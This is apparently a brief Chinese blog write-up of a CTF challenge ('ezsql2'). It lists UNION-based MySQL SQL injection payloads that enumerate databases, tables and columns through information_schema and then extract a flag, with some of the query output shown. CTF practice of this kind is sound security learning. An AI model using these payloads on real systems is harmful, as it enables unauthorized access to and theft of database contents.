最基本的联合查询
payload:
-1 'union select 1 ,group_concat(schema_name),3 from information_schema.schemata limit 0,1--+
select group_concat(schema_name) from information_schema.schemata limit 0,1--+
查出的数据库:
information_schema,mysql,performance_schema,test,test_db
test_db中的表:
test_tb,users
-1 'union select 1 ,group_concat(table_name),3 from information_schema.tables where table_schema = 'test_db' --+
-1 'union select 1 ,group_concat(column_name),3 from information_schema.columns where table_name = 'test_tb' --+
查找flag:
-1 'union select 1 ,flag,3 from test_tb--+
标签:information,name,ezsql2,--+,test,select,schema From: https://www.cnblogs.com/yhchen-blogs/p/16964562.html